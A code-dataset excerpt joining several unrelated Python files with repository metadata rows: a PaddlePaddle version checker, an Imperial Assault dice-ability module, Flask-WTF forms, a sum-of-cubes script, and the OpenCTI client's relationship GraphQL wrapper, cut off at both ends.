        if use_gpu and not paddle.is_compiled_with_cuda():
            logger.error(err)
            # sys.exit raises SystemExit (a BaseException), so it is NOT
            # swallowed by the broad `except Exception` below.
            sys.exit(1)
    except Exception:
        # Best-effort probe: is_compiled_with_cuda() may be unavailable on
        # some Paddle builds; skip the check instead of failing.
        pass
def check_version(version='2.0'):
    """
    Log error and exit when the installed version of paddlepaddle is
    not satisfied.

    Args:
        version (str): minimum required version, e.g. '2.0' or '2.1.0'.

    Raises:
        Exception: if the installed PaddlePaddle is older than `version`.
    """
    err = "PaddlePaddle version {} or higher is required, " \
          "or a suitable develop version is satisfied as well. \n" \
          "Please make sure the version is good with your code.".format(version)
    version_installed = [
        fluid_version.major, fluid_version.minor, fluid_version.patch,
        fluid_version.rc
    ]
    # A develop/source build reports 0.0.0.0 -- accept it unconditionally.
    if version_installed == ['0', '0', '0', '0']:
        return
    version_split = version.split('.')
    length = min(len(version_installed), len(version_split))
    for i in range(length):
        try:
            # Compare numerically: the previous string comparison wrongly
            # ordered multi-digit components (e.g. '10' < '9').
            installed, required = int(version_installed[i]), int(version_split[i])
        except ValueError:
            # Non-numeric component (e.g. an rc tag): fall back to strings.
            installed, required = version_installed[i], version_split[i]
        if installed > required:
            return
        if installed < required:
            raise Exception(err)
def check_config(cfg):
    """
    Check the correctness of the configuration file. Log error and exit
    when Config is not compliant.

    Args:
        cfg: parsed config object; must support membership tests and key
            access, plus attribute assignment for the `log_iter` default.

    Returns:
        The (possibly patched) config, with `log_iter` defaulting to 20.
    """
    err = "'{}' not specified in config file. Please set it in config file."
    check_list = ['architecture', 'num_classes']
    try:
        for var in check_list:
            if var not in cfg:  # idiomatic form of `not var in cfg`
                logger.error(err.format(var))
                sys.exit(1)
    except Exception:
        # Best-effort: if cfg does not support membership tests, skip it.
        pass
    if 'log_iter' not in cfg:
        # Default logging interval (iterations) when the config omits it.
        cfg.log_iter = 20
    return cfg
| 30.663717
| 80
| 0.649928
|
4a0a177b70ad20b5b9965b94c940d3270bd4bfaf
| 10,137
|
py
|
Python
|
src/swia/model/abilities.py
|
valeriodigregorio/swia-skirmish-calculator
|
7020e0e57b65c5606762b1f0781d0ec00a612b2e
|
[
"Apache-2.0"
] | null | null | null |
src/swia/model/abilities.py
|
valeriodigregorio/swia-skirmish-calculator
|
7020e0e57b65c5606762b1f0781d0ec00a612b2e
|
[
"Apache-2.0"
] | 4
|
2018-05-21T21:22:25.000Z
|
2018-05-21T21:28:13.000Z
|
src/swia/model/abilities.py
|
valeriodigregorio/swia-skirmish-calculator
|
7020e0e57b65c5606762b1f0781d0ec00a612b2e
|
[
"Apache-2.0"
] | null | null | null |
"""
abilities
Abilities module for "Star Wars: Imperial Assault"
"""
import _pickle as pickle
from swia.engine.actions import Attack, Roll
__author__ = "Valerio Di Gregorio"
__copyright__ = "Copyright 2018, Valerio Di Gregorio"
__date__ = '2018-04-02'
class Ability:
@staticmethod
def create(data):
"""
Create an ability from data.
:param data: Data of the ability.
:return: An instance of the ability object.
"""
def create_complex_ability(d):
t = {
'Fly-By': FlyByAbility,
}.get(d['name'], None)
if t is None:
raise ValueError(f"Unsupported ability name '{d['name']}'.")
return t(d)
ability_type = {
'surge': SurgeAbility,
'reroll': RerollAbility,
'conversion': ConversionAbility,
'complex': create_complex_ability,
}.get(data['type'], None)
if ability_type is None:
raise ValueError(f"Unsupported ability type '{data['type']}'.")
return ability_type(data)
def __init__(self, json):
"""
Create an ability
:param json: Data model that describes the ability in JSON.
"""
self._type = json.get('type', None)
if self._type is None:
raise ValueError(self._type)
self._model = json
self.effects = self._model.get('effects', {})
for key in ['accuracy', 'damage', 'surge', 'pierce', 'block', 'evade', 'dodge']:
self.effects[key] = self.effects.get(key, 0)
@property
def type(self):
return self._model['type']
@property
def trigger(self):
return self._model['trigger']
@property
def action(self):
return self._model['action']
def can_apply(self, action):
"""
Check if the ability is applicable.
:param action: The action where the ability is performed.
:return: True if the ability can be applied. False otherwise.
"""
raise NotImplementedError()
def apply(self, action):
"""
Apply the ability to the action.
:param action: The action where the ability is performed.
"""
raise NotImplementedError()
class SurgeAbility(Ability):
    """An ability paid for with surge results during an attack."""

    def __init__(self, json):
        """
        Create a surge ability.
        :param json: Data model that describes the ability in JSON.
        """
        declared = json['type']
        if declared != 'surge':
            raise ValueError(declared)
        super().__init__(json)

    @property
    def cost(self):
        """Number of surges this ability consumes (defaults to 0)."""
        return self._model.get('cost', 0)

    def can_apply(self, attack):
        """
        Check if the ability is applicable.
        :param attack: The attack where the ability is performed.
        :return: True if the ability can be applied. False otherwise.
        """
        # Deliberately an exact type check (subclasses are rejected).
        return type(attack) is Attack and attack.surge_left >= self.cost

    def apply(self, attack):
        """
        Apply the ability to the action.
        :param attack: The attack where the ability is performed.
        :return: True if the effects were applied. False otherwise.
        """
        if not self.can_apply(attack):
            return False
        for effect in ['accuracy', 'damage', 'surge', 'pierce', 'block', 'evade', 'dodge']:
            setattr(attack, effect, getattr(attack, effect) + self.effects[effect])
        return True
class RerollAbility(Ability):
    """Ability that rerolls up to `attack` attack dice and `defense` defense dice."""
    def __init__(self, json):
        """
        Create a reroll ability
        :param json: Data model that describes the ability in JSON.
        """
        ability_type = json['type']
        if ability_type != 'reroll':
            raise ValueError(ability_type)
        # At least one die (attack or defense) must be rerollable.
        if json.get('attack', 0) + json.get('defense', 0) == 0:
            raise ValueError(f"Reroll ability can't reroll zero dice.")
        super().__init__(json)
    @property
    def attack(self):
        # Number of attack dice this ability may reroll (default 0).
        return self._model.get('attack', 0)
    @property
    def defense(self):
        # Number of defense dice this ability may reroll (default 0).
        return self._model.get('defense', 0)
    def can_apply(self, attack):
        """
        Check if the ability is applicable.
        :param attack: The attack where the ability is performed.
        :return: True if the ability can be applied. False otherwise.
        """
        return True
    def apply(self, attack):
        """
        Apply the ability to the action.
        :param attack: The attack where the ability is performed.
        """
        # n counts how many dice of this kind may still be rerolled.
        for reroll_type, n in [('attack', self.attack), ('defense', self.defense)]:
            if reroll_type in attack.rerolls_priority:
                priority = attack.rerolls_priority[reroll_type]
                # Walk dice in priority order; reversed when this ability's
                # action does not match the die type (NOTE(review): exact
                # semantics of rerolls_priority assumed -- confirm).
                for k, dmg in priority if reroll_type in self.action else reversed(priority):
                    if n == 0:
                        return True
                    roll = attack.rolls[reroll_type][k]
                    if self.can_apply(attack) and (roll is not None) and not roll.rerolled:
                        # Stop once rerolling would no longer help: compare the
                        # die's expected contribution (dmg / 6) against the
                        # damage total without rerolls.
                        if reroll_type in self.action:
                            if dmg / 6 < attack.no_rerolls_total_damage:
                                return True
                        else:
                            if dmg / 6 > attack.no_rerolls_total_damage:
                                return True
                        # Undo the old roll's effects, reroll, re-apply.
                        roll.revert(attack)
                        roll.reroll()
                        roll.apply(attack)
                        n -= 1
        return False
class ConversionAbility(Ability):
    """Ability that converts units of one attack attribute into another."""
    def __init__(self, json):
        """
        Create a conversion ability
        :param json: Data model that describes the ability in JSON.
        """
        ability_type = json['type']
        if ability_type != 'conversion':
            raise ValueError(ability_type)
        # Source/target descriptors; each holds an 'attribute' name and,
        # optionally, a unit 'amount'.
        self.from_attribute = json['from']
        self.to_attribute = json['to']
        self.min_amount = json.get('min', None)
        self.max_amount = json.get('max', None)
        # Guard that prevents re-entering this ability while simulating.
        self._skip = False
        super().__init__(json)
    def get_conversion_range(self, attack):
        """
        Retrieve the range of units that can be converted during this attack.
        :param attack: The attack where the conversion is performed.
        :return: The range of units that can be converted as a tuple (min, max).
        None range if conversion can't be applied.
        """
        n = getattr(attack, self.from_attribute['attribute'])
        if n < 0:
            n = 0
        # Clamp the configured bounds to the units actually available (n).
        mx = self.max_amount if self.max_amount is not None else n
        mn = self.min_amount if self.min_amount is not None else mx
        if n < mx:
            mx = n
        if n < mn:
            return None
        return mn, mx
    def can_apply(self, attack):
        """
        Check if the ability is applicable.
        :param attack: The attack where the ability is performed.
        :return: True if the ability can be applied. False otherwise.
        """
        if self._skip:
            return False
        n = getattr(attack, self.from_attribute['attribute'], 0)
        r = self.get_conversion_range(attack)
        if r is None:
            return False
        c = self.from_attribute.get('amount', 0)
        if c == 0:
            return True
        return n > r[0]
    def _do_apply(self, attack, n):
        # Move n units: subtract from the source attribute and add to the
        # target, each rounded down to a whole multiple of its 'amount'.
        if n > 0:
            c = self.from_attribute.get('amount', 0)
            k = 0 if c == 0 else n // c * c
            if k != 0:
                setattr(attack, self.from_attribute['attribute'],
                        getattr(attack, self.from_attribute['attribute'], 0) - k)
            c = self.to_attribute.get('amount', 0)
            k = 0 if c == 0 else n // c * c
            if k != 0:
                setattr(attack, self.to_attribute['attribute'],
                        getattr(attack, self.to_attribute['attribute'], 0) + k)
    def apply(self, attack):
        """
        Apply the ability to the action.
        :param attack: The attack where the ability is performed.
        """
        def simulate_conversion(rng):
            # Try every candidate amount on a deep copy of the attack
            # (pickle round-trip) and rank candidates by resulting damage.
            total = {}
            self._skip = True
            dump = pickle.dumps(attack, -1)
            for i in rng:
                a = pickle.loads(dump)
                self._do_apply(a, i)
                a.simulate()
                total[i] = a.total_damage
            self._skip = False
            return sorted(total.items(), key=lambda t: (t[1], t[0]), reverse=True)
        if self._skip:
            return False
        r = self.get_conversion_range(attack)
        if r is None:
            return False
        mn, mx = r
        n = mx
        if mn != mx:
            priority = simulate_conversion(range(mn, mx + 1))
            # Attacker picks the best-damage amount, defender the worst.
            n = {
                'attack': priority[0][0],
                'defense': priority[-1][0],
            }.get(self.action[0], None)
            if n is None:
                raise AttributeError(self.action[0])
        self._do_apply(attack, n)
        return True
class FlyByAbility(Ability):
    """Fly-By: adds an extra blue attack die at range 2 or less."""

    def __init__(self, json):
        """
        Create the Fly-By ability.
        :param json: Data model that describes the ability in JSON.
        """
        # Validate 'type' first, then 'name', matching the original order.
        for field, expected in (('type', 'custom'), ('name', 'Fly-By')):
            if json[field] != expected:
                raise ValueError(json[field])
        super().__init__(json)

    def can_apply(self, attack):
        """
        Check if the ability is applicable.
        :param attack: The attack where the ability is performed.
        :return: True if the ability can be applied. False otherwise.
        """
        return attack.context.attack_range <= 2

    def apply(self, attack):
        """
        Apply the ability to the action.
        :param attack: The attack where the ability is performed.
        :return: True if the extra die was added. False otherwise.
        """
        if not self.can_apply(attack):
            return False
        extra_die = Roll('blue')
        extra_die.apply(attack)
        attack.rolls['attack'].append(extra_die)
        return True
| 32.180952
| 93
| 0.544638
|
4a0a180a813c9fc6a4e3e968be369956fcead382
| 710
|
py
|
Python
|
instructors/course-2015/flask-cont/examples/in_class/forms.py
|
mgadagin/PythonClass
|
70b370362d75720b3fb0e1d6cc8158f9445e9708
|
[
"MIT"
] | 46
|
2017-09-27T20:19:36.000Z
|
2020-12-08T10:07:19.000Z
|
instructors/course-2015/flask-cont/examples/in_class/forms.py
|
mgadagin/PythonClass
|
70b370362d75720b3fb0e1d6cc8158f9445e9708
|
[
"MIT"
] | 6
|
2018-01-09T08:07:37.000Z
|
2020-09-07T12:25:13.000Z
|
instructors/course-2015/flask-cont/examples/in_class/forms.py
|
mgadagin/PythonClass
|
70b370362d75720b3fb0e1d6cc8158f9445e9708
|
[
"MIT"
] | 18
|
2017-10-10T02:06:51.000Z
|
2019-12-01T10:18:13.000Z
|
from flask_wtf import Form
from wtforms import StringField, PasswordField, TextAreaField
from wtforms.fields.html5 import EmailField, URLField
from wtforms.validators import DataRequired, URL, Optional
class HackNewsUserForm(Form):
    # Sign-up/login form: all three fields are mandatory.
    name = StringField('name', validators=[DataRequired()])
    password = PasswordField('password', validators=[DataRequired()])
    # HTML5 email input; only presence is validated here.
    email = EmailField('email', validators=[DataRequired()])
    # NOTE: wtforms also ships an Email() validator for format checking.
class HackNewsPostForm(Form):
    # Link-submission form: title and URL required, body text optional.
    title = StringField('title', validators=[DataRequired()])
    # URL() validates the format; its message is shown on invalid input.
    url = URLField('url', validators=[URL(message="link to post"), DataRequired()])
    text = TextAreaField('text', validators=[Optional()])
| 35.5
| 83
| 0.743662
|
4a0a1864ab776664c0eea0b0c90c910a1df36011
| 119
|
py
|
Python
|
51177.py
|
shaurya10898/CS-177
|
ab72c24a2e9cc96fe9e99db4b80ff12e4c8bc5f9
|
[
"MIT"
] | null | null | null |
51177.py
|
shaurya10898/CS-177
|
ab72c24a2e9cc96fe9e99db4b80ff12e4c8bc5f9
|
[
"MIT"
] | null | null | null |
51177.py
|
shaurya10898/CS-177
|
ab72c24a2e9cc96fe9e99db4b80ff12e4c8bc5f9
|
[
"MIT"
] | null | null | null |
# Read n and print the sum of cubes 1**3 + 2**3 + ... + (n-1)**3
# (range's upper bound is exclusive, so n itself is not included).
n = int(input("Enter a positive number:"))
total = sum(k ** 3 for k in range(1, n))
print(total)
| 17
| 42
| 0.563025
|
4a0a18b349aa3737f4aa144c8d407ccf5f6ef031
| 39,308
|
py
|
Python
|
pycti/entities/opencti_stix_core_relationship.py
|
fscc-samiR/client-python
|
7c6061c1c96b8a1a9b9b0618ce742549c2949c56
|
[
"Apache-2.0"
] | null | null | null |
pycti/entities/opencti_stix_core_relationship.py
|
fscc-samiR/client-python
|
7c6061c1c96b8a1a9b9b0618ce742549c2949c56
|
[
"Apache-2.0"
] | null | null | null |
pycti/entities/opencti_stix_core_relationship.py
|
fscc-samiR/client-python
|
7c6061c1c96b8a1a9b9b0618ce742549c2949c56
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
class StixCoreRelationship:
    def __init__(self, opencti):
        """
        Wrapper around stix_core_relationship GraphQL operations.
        :param opencti: the OpenCTI API client used to run queries.
        """
        self.opencti = opencti
        # Default GraphQL selection set used by list()/read() when the caller
        # does not pass customAttributes.
        self.properties = """
            id
            entity_type
            parent_types
            spec_version
            created_at
            updated_at
            standard_id
            relationship_type
            description
            start_time
            stop_time
            revoked
            confidence
            lang
            created
            modified
            createdBy {
                ... on Identity {
                    id
                    standard_id
                    entity_type
                    parent_types
                    spec_version
                    identity_class
                    name
                    description
                    roles
                    contact_information
                    x_opencti_aliases
                    created
                    modified
                    objectLabel {
                        edges {
                            node {
                                id
                                value
                                color
                            }
                        }
                    }
                }
                ... on Organization {
                    x_opencti_organization_type
                    x_opencti_reliability
                }
                ... on Individual {
                    x_opencti_firstname
                    x_opencti_lastname
                }
            }
            objectMarking {
                edges {
                    node {
                        id
                        standard_id
                        entity_type
                        definition_type
                        definition
                        created
                        modified
                        x_opencti_order
                        x_opencti_color
                    }
                }
            }
            objectLabel {
                edges {
                    node {
                        id
                        value
                        color
                    }
                }
            }
            externalReferences {
                edges {
                    node {
                        id
                        standard_id
                        entity_type
                        source_name
                        description
                        url
                        hash
                        external_id
                        created
                        modified
                        importFiles {
                            edges {
                                node {
                                    id
                                    name
                                    size
                                    metaData {
                                        mimetype
                                        version
                                    }
                                }
                            }
                        }
                    }
                }
            }
            from {
                ... on BasicObject {
                    id
                    entity_type
                    parent_types
                }
                ... on BasicRelationship {
                    id
                    entity_type
                    parent_types
                }
                ... on StixObject {
                    standard_id
                    spec_version
                    created_at
                    updated_at
                }
                ... on AttackPattern {
                    name
                }
                ... on Campaign {
                    name
                }
                ... on CourseOfAction {
                    name
                }
                ... on Individual {
                    name
                }
                ... on Organization {
                    name
                }
                ... on Sector {
                    name
                }
                ... on System {
                    name
                }
                ... on Indicator {
                    name
                }
                ... on Infrastructure {
                    name
                }
                ... on IntrusionSet {
                    name
                }
                ... on Position {
                    name
                }
                ... on City {
                    name
                }
                ... on Country {
                    name
                }
                ... on Region {
                    name
                }
                ... on Malware {
                    name
                }
                ... on ThreatActor {
                    name
                }
                ... on Tool {
                    name
                }
                ... on Vulnerability {
                    name
                }
                ... on Incident {
                    name
                }
                ... on StixCyberObservable {
                    observable_value
                }
                ... on StixCoreRelationship {
                    standard_id
                    spec_version
                    created_at
                    updated_at
                }
            }
            to {
                ... on BasicObject {
                    id
                    entity_type
                    parent_types
                }
                ... on BasicRelationship {
                    id
                    entity_type
                    parent_types
                }
                ... on StixObject {
                    standard_id
                    spec_version
                    created_at
                    updated_at
                }
                ... on AttackPattern {
                    name
                }
                ... on Campaign {
                    name
                }
                ... on CourseOfAction {
                    name
                }
                ... on Individual {
                    name
                }
                ... on Organization {
                    name
                }
                ... on Sector {
                    name
                }
                ... on System {
                    name
                }
                ... on Indicator {
                    name
                }
                ... on Infrastructure {
                    name
                }
                ... on IntrusionSet {
                    name
                }
                ... on Position {
                    name
                }
                ... on City {
                    name
                }
                ... on Country {
                    name
                }
                ... on Region {
                    name
                }
                ... on Malware {
                    name
                }
                ... on ThreatActor {
                    name
                }
                ... on Tool {
                    name
                }
                ... on Vulnerability {
                    name
                }
                ... on Incident {
                    name
                }
                ... on StixCyberObservable {
                    observable_value
                }
                ... on StixCoreRelationship {
                    standard_id
                    spec_version
                    created_at
                    updated_at
                }
            }
        """
"""
List stix_core_relationship objects
:param fromId: the id of the source entity of the relation
:param toId: the id of the target entity of the relation
:param relationship_type: the relation type
:param startTimeStart: the start_time date start filter
:param startTimeStop: the start_time date stop filter
:param stopTimeStart: the stop_time date start filter
:param stopTimeStop: the stop_time date stop filter
:param first: return the first n rows from the after ID (or the beginning if not set)
:param after: ID of the first row for pagination
:return List of stix_core_relationship objects
"""
def list(self, **kwargs):
element_id = kwargs.get("elementId", None)
from_id = kwargs.get("fromId", None)
from_types = kwargs.get("fromTypes", None)
to_id = kwargs.get("toId", None)
to_types = kwargs.get("toTypes", None)
relationship_type = kwargs.get("relationship_type", None)
start_time_start = kwargs.get("startTimeStart", None)
start_time_stop = kwargs.get("startTimeStop", None)
stop_time_start = kwargs.get("stopTimeStart", None)
stop_time_stop = kwargs.get("stopTimeStop", None)
filters = kwargs.get("filters", [])
first = kwargs.get("first", 100)
after = kwargs.get("after", None)
order_by = kwargs.get("orderBy", None)
order_mode = kwargs.get("orderMode", None)
custom_attributes = kwargs.get("customAttributes", None)
get_all = kwargs.get("getAll", False)
with_pagination = kwargs.get("withPagination", False)
if get_all:
first = 100
self.opencti.log(
"info",
"Listing stix_core_relationships with {type: "
+ str(relationship_type)
+ ", from_id: "
+ str(from_id)
+ ", to_id: "
+ str(to_id)
+ "}",
)
query = (
"""
query StixCoreRelationships($elementId: String, $fromId: String, $fromTypes: [String], $toId: String, $toTypes: [String], $relationship_type: [String], $startTimeStart: DateTime, $startTimeStop: DateTime, $stopTimeStart: DateTime, $stopTimeStop: DateTime, $filters: [StixCoreRelationshipsFiltering], $first: Int, $after: ID, $orderBy: StixCoreRelationshipsOrdering, $orderMode: OrderingMode) {
stixCoreRelationships(elementId: $elementId, fromId: $fromId, fromTypes: $fromTypes, toId: $toId, toTypes: $toTypes, relationship_type: $relationship_type, startTimeStart: $startTimeStart, startTimeStop: $startTimeStop, stopTimeStart: $stopTimeStart, stopTimeStop: $stopTimeStop, filters: $filters, first: $first, after: $after, orderBy: $orderBy, orderMode: $orderMode) {
edges {
node {
"""
+ (custom_attributes if custom_attributes is not None else self.properties)
+ """
}
}
pageInfo {
startCursor
endCursor
hasNextPage
hasPreviousPage
globalCount
}
}
}
"""
)
result = self.opencti.query(
query,
{
"elementId": element_id,
"fromId": from_id,
"fromTypes": from_types,
"toId": to_id,
"toTypes": to_types,
"relationship_type": relationship_type,
"startTimeStart": start_time_start,
"startTimeStop": start_time_stop,
"stopTimeStart": stop_time_start,
"stopTimeStop": stop_time_stop,
"filters": filters,
"first": first,
"after": after,
"orderBy": order_by,
"orderMode": order_mode,
},
)
if get_all:
final_data = []
data = self.opencti.process_multiple(
result["data"]["stixCoreRelationships"]
)
final_data = final_data + data
while result["data"]["stixCoreRelationships"]["pageInfo"]["hasNextPage"]:
after = result["data"]["stixCoreRelationships"]["pageInfo"]["endCursor"]
self.opencti.log("info", "Listing StixCoreRelationships after " + after)
result = self.opencti.query(
query,
{
"elementId": element_id,
"fromId": from_id,
"fromTypes": from_types,
"toId": to_id,
"toTypes": to_types,
"relationship_type": relationship_type,
"startTimeStart": start_time_start,
"startTimeStop": start_time_stop,
"stopTimeStart": stop_time_start,
"stopTimeStop": stop_time_stop,
"filters": filters,
"first": first,
"after": after,
"orderBy": order_by,
"orderMode": order_mode,
},
)
data = self.opencti.process_multiple(
result["data"]["stixCoreRelationships"]
)
final_data = final_data + data
return final_data
else:
return self.opencti.process_multiple(
result["data"]["stixCoreRelationships"], with_pagination
)
"""
Read a stix_core_relationship object
:param id: the id of the stix_core_relationship
:param elementId: the id of the entity of the relation
:param fromId: the id of the source entity of the relation
:param toId: the id of the target entity of the relation
:param relationship_type: the relation type
:param startTimeStart: the start_time date start filter
:param startTimeStop: the start_time date stop filter
:param stopTimeStart: the stop_time date start filter
:param stopTimeStop: the stop_time date stop filter
:return stix_core_relationship object
"""
def read(self, **kwargs):
id = kwargs.get("id", None)
element_id = kwargs.get("elementId", None)
from_id = kwargs.get("fromId", None)
to_id = kwargs.get("toId", None)
relationship_type = kwargs.get("relationship_type", None)
start_time_start = kwargs.get("startTimeStart", None)
start_time_stop = kwargs.get("startTimeStop", None)
stop_time_start = kwargs.get("stopTimeStart", None)
stop_time_stop = kwargs.get("stopTimeStop", None)
custom_attributes = kwargs.get("customAttributes", None)
if id is not None:
self.opencti.log("info", "Reading stix_core_relationship {" + id + "}.")
query = (
"""
query StixCoreRelationship($id: String!) {
stixCoreRelationship(id: $id) {
"""
+ (
custom_attributes
if custom_attributes is not None
else self.properties
)
+ """
}
}
"""
)
result = self.opencti.query(query, {"id": id})
return self.opencti.process_multiple_fields(
result["data"]["stixCoreRelationship"]
)
elif from_id is not None and to_id is not None:
result = self.list(
elementId=element_id,
fromId=from_id,
toId=to_id,
relationship_type=relationship_type,
startTimeStart=start_time_start,
startTimeStop=start_time_stop,
stopTimeStart=stop_time_start,
stopTimeStop=stop_time_stop,
)
if len(result) > 0:
return result[0]
else:
return None
else:
self.opencti.log("error", "Missing parameters: id or from_id and to_id")
return None
"""
Create a stix_core_relationship object
:param name: the name of the Attack Pattern
:return stix_core_relationship object
"""
def create(self, **kwargs):
from_id = kwargs.get("fromId", None)
to_id = kwargs.get("toId", None)
stix_id = kwargs.get("stix_id", None)
relationship_type = kwargs.get("relationship_type", None)
description = kwargs.get("description", None)
start_time = kwargs.get("start_time", None)
stop_time = kwargs.get("stop_time", None)
revoked = kwargs.get("revoked", None)
confidence = kwargs.get("confidence", None)
lang = kwargs.get("lang", None)
created = kwargs.get("created", None)
modified = kwargs.get("modified", None)
created_by = kwargs.get("createdBy", None)
object_marking = kwargs.get("objectMarking", None)
object_label = kwargs.get("objectLabel", None)
external_references = kwargs.get("externalReferences", None)
kill_chain_phases = kwargs.get("killChainPhases", None)
update = kwargs.get("update", False)
self.opencti.log(
"info",
"Creating stix_core_relationship {" + from_id + ", " + to_id + "}.",
)
query = """
mutation StixCoreRelationshipAdd($input: StixCoreRelationshipAddInput!) {
stixCoreRelationshipAdd(input: $input) {
id
standard_id
entity_type
parent_types
}
}
"""
result = self.opencti.query(
query,
{
"input": {
"fromId": from_id,
"toId": to_id,
"stix_id": stix_id,
"relationship_type": relationship_type,
"description": description,
"start_time": start_time,
"stop_time": stop_time,
"revoked": revoked,
"confidence": confidence,
"lang": lang,
"created": created,
"modified": modified,
"createdBy": created_by,
"objectMarking": object_marking,
"objectLabel": object_label,
"externalReferences": external_references,
"killChainPhases": kill_chain_phases,
"update": update,
}
},
)
return self.opencti.process_multiple_fields(
result["data"]["stixCoreRelationshipAdd"]
)
"""
Update a stix_core_relationship object field
:param id: the stix_core_relationship id
:param input: the input of the field
:return The updated stix_core_relationship object
"""
def update_field(self, **kwargs):
id = kwargs.get("id", None)
input = kwargs.get("input", None)
if id is not None and input is not None:
self.opencti.log(
"info",
"Updating stix_core_relationship {" + id + "}",
)
query = """
mutation StixCoreRelationshipEdit($id: ID!, $input: [EditInput]!) {
stixCoreRelationshipEdit(id: $id) {
fieldPatch(input: $input) {
id
standard_id
entity_type
}
}
}
"""
result = self.opencti.query(
query,
{
"id": id,
"input": input,
},
)
return self.opencti.process_multiple_fields(
result["data"]["stixCoreRelationshipEdit"]["fieldPatch"]
)
else:
self.opencti.log(
"error",
"[opencti_stix_core_relationship] Missing parameters: id and key and value",
)
return None
"""
Delete a stix_core_relationship
:param id: the stix_core_relationship id
:return void
"""
def delete(self, **kwargs):
id = kwargs.get("id", None)
if id is not None:
self.opencti.log("info", "Deleting stix_core_relationship {" + id + "}.")
query = """
mutation StixCoreRelationshipEdit($id: ID!) {
stixCoreRelationshipEdit(id: $id) {
delete
}
}
"""
self.opencti.query(query, {"id": id})
else:
self.opencti.log(
"error", "[opencti_stix_core_relationship] Missing parameters: id"
)
return None
"""
Add a Marking-Definition object to stix_core_relationship object (object_marking_refs)
:param id: the id of the stix_core_relationship
:param marking_definition_id: the id of the Marking-Definition
:return Boolean
"""
def add_marking_definition(self, **kwargs):
id = kwargs.get("id", None)
marking_definition_id = kwargs.get("marking_definition_id", None)
if id is not None and marking_definition_id is not None:
custom_attributes = """
id
objectMarking {
edges {
node {
id
standard_id
entity_type
definition_type
definition
x_opencti_order
x_opencti_color
created
modified
}
}
}
"""
stix_core_relationship = self.read(
id=id, customAttributes=custom_attributes
)
if stix_core_relationship is None:
self.opencti.log(
"error", "Cannot add Marking-Definition, entity not found"
)
return False
if marking_definition_id in stix_core_relationship["objectMarkingIds"]:
return True
else:
self.opencti.log(
"info",
"Adding Marking-Definition {"
+ marking_definition_id
+ "} to Stix-Domain-Object {"
+ id
+ "}",
)
query = """
mutation StixCoreRelationshipAddRelation($id: ID!, $input: StixMetaRelationshipAddInput) {
stixCoreRelationshipEdit(id: $id) {
relationAdd(input: $input) {
id
}
}
}
"""
self.opencti.query(
query,
{
"id": id,
"input": {
"toId": marking_definition_id,
"relationship_type": "object-marking",
},
},
)
return True
else:
self.opencti.log(
"error", "Missing parameters: id and marking_definition_id"
)
return False
"""
Remove a Marking-Definition object to stix_core_relationship
:param id: the id of the stix_core_relationship
:param marking_definition_id: the id of the Marking-Definition
:return Boolean
"""
def remove_marking_definition(self, **kwargs):
id = kwargs.get("id", None)
marking_definition_id = kwargs.get("marking_definition_id", None)
if id is not None and marking_definition_id is not None:
self.opencti.log(
"info",
"Removing Marking-Definition {"
+ marking_definition_id
+ "} from stix_core_relationship {"
+ id
+ "}",
)
query = """
mutation StixCoreRelationshipRemoveRelation($id: ID!, $toId: String!, $relationship_type: String!) {
stixCoreRelationshipEdit(id: $id) {
relationDelete(toId: $toId, relationship_type: $relationship_type) {
id
}
}
}
"""
self.opencti.query(
query,
{
"id": id,
"toId": marking_definition_id,
"relationship_type": "object-marking",
},
)
return True
else:
self.opencti.log("error", "Missing parameters: id and label_id")
return False
"""
Add a Label object to stix_core_relationship(labelging)
:param id: the id of the stix_core_relationship
:param label_id: the id of the Label
:return Boolean
"""
def add_label(self, **kwargs):
id = kwargs.get("id", None)
label_id = kwargs.get("label_id", None)
label_name = kwargs.get("label_name", None)
if label_name is not None:
label = self.opencti.label.read(
filters=[{"key": "value", "values": [label_name]}]
)
if label:
label_id = label["id"]
else:
label = self.opencti.label.create(value=label_name)
label_id = label["id"]
if id is not None and label_id is not None:
self.opencti.log(
"info",
"Adding label {"
+ label_id
+ "} to stix-core-relationship {"
+ id
+ "}",
)
query = """
mutation StixCoreRelationshipAddRelation($id: ID!, $input: StixMetaRelationshipAddInput) {
stixCoreRelationshipEdit(id: $id) {
relationAdd(input: $input) {
id
}
}
}
"""
self.opencti.query(
query,
{
"id": id,
"input": {
"toId": label_id,
"relationship_type": "object-label",
},
},
)
return True
else:
self.opencti.log("error", "Missing parameters: id and label_id")
return False
"""
Add a External-Reference object to stix_core_relationship (external-reference)
:param id: the id of the stix_core_relationship
:param marking_definition_id: the id of the Marking-Definition
:return Boolean
"""
def add_external_reference(self, **kwargs):
id = kwargs.get("id", None)
external_reference_id = kwargs.get("external_reference_id", None)
if id is not None and external_reference_id is not None:
self.opencti.log(
"info",
"Adding External-Reference {"
+ external_reference_id
+ "} to stix-core-relationship {"
+ id
+ "}",
)
query = """
mutation StixCoreRelationshipEditRelationAdd($id: ID!, $input: StixMetaRelationshipAddInput) {
stixCoreRelationshipEdit(id: $id) {
relationAdd(input: $input) {
id
}
}
}
"""
self.opencti.query(
query,
{
"id": id,
"input": {
"toId": external_reference_id,
"relationship_type": "external-reference",
},
},
)
return True
else:
self.opencti.log(
"error", "Missing parameters: id and external_reference_id"
)
return False
"""
Remove a External-Reference object to stix_core_relationship object
:param id: the id of the stix_core_relationship
:param external_reference_id: the id of the External-Reference
:return Boolean
"""
def remove_external_reference(self, **kwargs):
id = kwargs.get("id", None)
external_reference_id = kwargs.get("external_reference_id", None)
if id is not None and external_reference_id is not None:
self.opencti.log(
"info",
"Removing External-Reference {"
+ external_reference_id
+ "} from stix_core_relationship {"
+ id
+ "}",
)
query = """
mutation StixCoreRelationshipRemoveRelation($id: ID!, $toId: String!, $relationship_type: String!) {
stixCoreRelationshipEdit(id: $id) {
relationDelete(toId: $toId, relationship_type: $relationship_type) {
id
}
}
}
"""
self.opencti.query(
query,
{
"id": id,
"toId": external_reference_id,
"relationship_type": "external-reference",
},
)
return True
else:
self.opencti.log("error", "Missing parameters: id and label_id")
return False
"""
Add a Kill-Chain-Phase object to stix_core_relationship object (kill_chain_phases)
:param id: the id of the stix_core_relationship
:param kill_chain_phase_id: the id of the Kill-Chain-Phase
:return Boolean
"""
def add_kill_chain_phase(self, **kwargs):
id = kwargs.get("id", None)
kill_chain_phase_id = kwargs.get("kill_chain_phase_id", None)
if id is not None and kill_chain_phase_id is not None:
self.opencti.log(
"info",
"Adding Kill-Chain-Phase {"
+ kill_chain_phase_id
+ "} to stix-core-relationship {"
+ id
+ "}",
)
query = """
mutation StixCoreRelationshipAddRelation($id: ID!, $input: StixMetaRelationshipAddInput) {
